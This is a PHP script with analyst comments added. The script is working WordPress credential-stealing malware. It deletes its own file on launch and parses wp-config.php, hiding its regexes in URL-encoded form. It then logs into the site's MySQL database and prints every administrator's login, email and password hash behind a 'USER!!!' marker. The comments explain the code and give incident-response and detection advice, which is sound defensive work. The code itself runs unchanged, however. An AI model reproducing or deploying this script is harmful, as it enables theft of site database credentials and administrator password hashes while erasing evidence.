<?php unlink(__FILE__); function GetDocRoot()
{
    // Analyst note on the statement that precedes this function on the same line:
    // unlink(__FILE__) runs at top level before anything else and removes this
    // script's own file from disk. After a run the file will normally not be
    // present for on-disk scanning, so evidence has to come from web server access
    // logs, file-integrity / audit records of the create-and-delete, or backups.
    //
    // GetDocRoot(): works out the site's document root from request variables.
    // It looks for the last occurrence of REQUEST_URI inside SCRIPT_FILENAME and
    // returns the part of SCRIPT_FILENAME that comes before it.
    //
    // Returns (string):
    //   - $_SERVER['DOCUMENT_ROOT'] when REQUEST_URI does not occur in SCRIPT_FILENAME
    //   - "/" when the match starts at offset 0
    //   - otherwise the SCRIPT_FILENAME prefix up to the match
    $docroot_end = strrpos($_SERVER['SCRIPT_FILENAME'], $_SERVER['REQUEST_URI']);
    if ($docroot_end === FALSE)
    {
        // No match: fall back to the server-provided document root.
        return $_SERVER['DOCUMENT_ROOT'];
    }
    elseif ($docroot_end === 0)
    {
        // The URI matched at the very start of the path, so the root is "/".
        return "/";
    }
    else
    {
        // Everything before the URI portion is treated as the document root.
        return substr($_SERVER['SCRIPT_FILENAME'], 0, $docroot_end);
    }
}


/**
 * Analyst summary: extracts database credentials from the text of a WordPress
 * configuration file, connects to that database, and prints account data for
 * users that have a usermeta value containing "administrator".
 *
 * What the visible code does:
 *   1. Pulls define('KEY', 'VALUE') pairs from $cont and keeps DB_NAME, DB_USER,
 *      DB_PASSWORD and DB_HOST (matched case-insensitively with stristr).
 *   2. Pulls the $table_prefix value from $cont.
 *   3. Opens a mysqli connection with those values (port 3306 unless DB_HOST
 *      contains "host:port").
 *   4. Reads user_login, user_email, user_status, user_pass and ID from
 *      <prefix>users, and for each row checks <prefix>usermeta.
 *   5. Echoes one tab-separated line per matching user into the HTTP response,
 *      prefixed with the literal marker "USER!!!" and the request's Host header
 *      with "www." removed.
 *
 * Response guidance: if this script ran, treat the database credentials and
 * every echoed password hash as exposed. Rotate the DB password, reset the
 * listed accounts' passwords, and look for the write path that placed the file.
 * The "USER!!!" marker and the tab-separated layout are usable as a signature
 * where HTTP response bodies are inspected or logged.
 *
 * @param string $cont Contents of the configuration file (read by the caller).
 * @return bool TRUE when a database connection was made and the user loop ran;
 *              FALSE otherwise.
 */
function parse_wp($cont)
{
    $db_name = NULL;
    $db_user = NULL;
    $db_pass = NULL;
    $db_host = NULL;

    // The pattern is stored URL-encoded and decoded at runtime; presumably this
    // keeps the plain regex out of simple string scans (intent not shown here).
    // Decoded it reads:  /(define\(\s*\')([^\']+)(\',\s*\')([^\']+)/
    // Group 2 is the constant name, group 4 is its single-quoted value.
    preg_match_all(rawurldecode('%2F%28define%5C%28%5Cs%2A%5C%27%29%28%5B%5E%5C%27%5D%2B%29%28%5C%27%2C%5Cs%2A%5C%27%29%28%5B%5E%5C%27%5D%2B%29%2F'), $cont, $matches);
    if (is_array($matches)) {
        // Walk every define() pair and keep the four database settings.
        for ($i = 0; $i < count($matches[2]); $i++) {
            if (stristr($matches[2][$i], "DB_NAME")) {
                $db_name = $matches[4][$i];
            } elseif (stristr($matches[2][$i], "db_user")) {
                $db_user = $matches[4][$i];
            } elseif (stristr($matches[2][$i], "db_password")) {
                $db_pass = $matches[4][$i];
            } elseif (stristr($matches[2][$i], "db_host")) {
                $db_host = $matches[4][$i];
            }
        }

        // Second URL-encoded pattern; decoded:  /table_prefix\s*=\s*['"](.*)['"];/
        // Group 1 is the table prefix string.
        preg_match_all(rawurldecode("%2Ftable_prefix%5Cs%2A%3D%5Cs%2A%5B%27%22%5D%28.%2A%29%5B%27%22%5D%3B%2F"), $cont, $matches);

        if (is_array($matches))
        {
            // Takes the first prefix match; $db_prefix is assigned only here.
            $db_prefix = $matches[1][0];
        }

        // Nothing further happens unless a database name was found.
        if (!empty($db_name)) {

            // DB_HOST may be written as "host:port"; split it when a colon is present.
            if (strpos($db_host, ":") !== FALSE)
            {
                $host_port = explode(":", $db_host);
                $host = $host_port[0];
                $port = intval($host_port[1]);
            }
            else
            {
                $host = $db_host;
                $port = 3306;
            }

            // Connects with the site's own credentials, so on the database side this
            // looks like the application account logging in from the web server.
            if ($conn = mysqli_connect($host, $db_user, $db_pass, $db_name, $port)) {

                // Reads login, e-mail, status, password hash and ID for every row of the users table.
                $result = mysqli_query($conn, "SELECT user_login, user_email, user_status, user_pass, ID FROM " . $db_prefix . "users;");

                // Buffer all rows first; the per-user query below reuses the connection.
                $results = Array();
                while (($temp = mysqli_fetch_array($result)))
                {
                    $results[] = $temp;
                }

                foreach ($results as $item)
                {
                    // $item[4] is the ID column. The query keeps only users with some
                    // usermeta value containing "administrator" (presumably the
                    // capabilities row; the meta_key is not checked).
                    $q = "SELECT meta_value FROM ". $db_prefix . "usermeta WHERE user_id=" . $item[4] . " AND meta_value LIKE '%administrator%';";

                    $result2 = mysqli_query($conn, $q);

                    // No matching usermeta row: skip this user.
                    if (empty(mysqli_fetch_array($result2, MYSQLI_NUM)))
                    {
                        continue;
                    }
                    // Output line: marker, Host header without "www.", then user_login,
                    // user_email, user_status and user_pass, tab-separated.
                    echo "USER!!!\t" . str_replace("www.", "", $_SERVER['HTTP_HOST']) . "\t" . $item[0] . "\t" . $item[1] . "\t" . $item[2] . "\t" . $item[3] . PHP_EOL;
                }

                mysqli_close($conn);
                return TRUE;
            }
        }
    }
    return FALSE;
}

// Entry point: reads wp-config.php from the directory GetDocRoot() returns.
// The @ operator suppresses any warning if the file is missing or unreadable,
// so a failed read produces no output and no PHP error message.
// Hardening note: this read runs as the web server's PHP process, so it only
// succeeds where that process can read wp-config.php at that path.
$data = @file_get_contents(GetDocRoot() . "/wp-config.php");

// Only a non-empty read is passed on; the return value of parse_wp() is ignored.
if (!empty($data))
{
    parse_wp($data);
}

